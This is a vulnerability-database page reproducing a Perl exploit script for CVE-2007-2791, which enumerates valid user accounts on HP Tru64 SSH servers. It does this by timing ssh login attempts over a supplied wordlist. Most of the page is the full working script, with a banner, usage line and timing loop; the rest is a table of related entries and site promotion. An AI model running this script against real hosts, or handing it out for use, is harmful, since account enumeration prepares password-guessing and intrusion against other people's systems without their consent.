Vulners
Lucene search
hptru64-enum.txt
🗓️ 07 Jun 2007 00:00:00Reported by Andrea PurificatoType 
packetstorm🔗 packetstormsecurity.com👁 39 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791) | 4 Jun 200700:00 | – | zdt |
 | CVE-2007-2791 | 22 May 200700:00 | – | cve |
 | CVE-2007-2791 | 22 May 200700:00 | – | cvelist |
 | HP Tru64 - Remote Secure Shell User Enumeration | 4 Jun 200700:00 | – | exploitdb |
 | EUVD-2007-2783 | 7 Oct 202500:30 | – | euvd |
 | HP Tru64 - Remote Secure Shell User Enumeration | 4 Jun 200700:00 | – | exploitpack |
 | CVE-2007-2791 | 22 May 200700:30 | – | nvd |
 | Design/Logic Flaw | 22 May 200700:30 | – | prion |
 | HP Tru64 - Remote Secure Shell User Enumeration Exploit | 1 Jul 201400:00 | – | seebug |
| HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791) | 5 Jun 200700:00 | – | seebug |
10
`#!/usr/bin/perl
use warnings;
use strict;
#
# Remember: you need to accept ssh key first!
#
use Tie::File;
use Fcntl 'O_RDONLY';
use Expect;
use Time::HiRes qw(gettimeofday);
#
# tru64-sshenum.pl
# HP Tru64 Remote Secure Shell user enumeration exploit (CVE-2007-2791).
#
# Author: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# The following supported software versions are affected:
#
# HP Tru64 UNIX v5.1B-4
# HP Tru64 UNIX v5.1B-3
#
# The Hewlett-Packard Company thanks Andrea Purificato for reporting this
# vulnerability to [email protected]
#
# References:
# - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01007552
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2791
# - http://rawlab.mindcreations.com/codes/exp/nix/tru64-sshenum.pl
#
my $verbose = undef;
my $port = 22;
my $timeout = 10;
print <<BANNER;
$0 - HP Tru64 Remote Secure Shell user enumeration exploit
Andrea "bunker" Purificato - http://rawlab.mindcreations.com
37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
BANNER
print "Usage: $0 <target> <userlist>\n" and exit(-1) if ($#ARGV<1);
my $target = $ARGV[0];
my $wordlist = $ARGV[1];
chomp (my $ssh = `which ssh`);
chomp (my $tel = `which telnet`);
my %htimes; my @atimes;
print "[+] Grabbing banner...\n";
my $exp = Expect->spawn("$tel -l fake $target $port")
or die "Cannot spawn $tel: $!\n";;
#$exp->log_stdout(0);
$exp->expect(5,['SSH|ssh'=>sub{$exp->send(".\n")}]);
$exp->close();
print "[+] Done!\n\n";
sub timing {
my $user = shift @_;
my $t0 = gettimeofday;
my $t1 = undef;
my $exp = Expect->spawn("$ssh -l $user -p $port $target")
or die "Cannot spawn $ssh: $!\n";;
$exp->log_stdout(0);
$exp->expect($timeout,['assword:'=>sub{$exp->send(".\n")}]);
$exp->expect(undef, [ qr'assword|denied'=>sub{$t1=gettimeofday}]);
$t1 = gettimeofday unless ($t1);
$exp->close();
return sprintf "%0.3f", ($t1-$t0);
}
tie my @wlst_ln, 'Tie::File', "$wordlist", mode=>O_RDONLY
or die "$wordlist: $!";
print "[+] Started, please wait: ";
for (@wlst_ln) {
print "($_ dup?)" if ($htimes{$_});
my $ret = timing($_);
$htimes{$_} = $ret unless ($htimes{$_});
push @atimes, $ret;
unless ($verbose) { print "." }
else { print "$_\t\t$ret\n" }
}
print " Done!\n\n";
#
# Do whatever you want with time values:
#
# (sorted by values)
#
foreach my $key (sort {$htimes{$b}<=>$htimes{$a}} keys %htimes) {
print "$key:\t\t$htimes{$key}\n";
}
exit(0);
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jun 2007 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.06921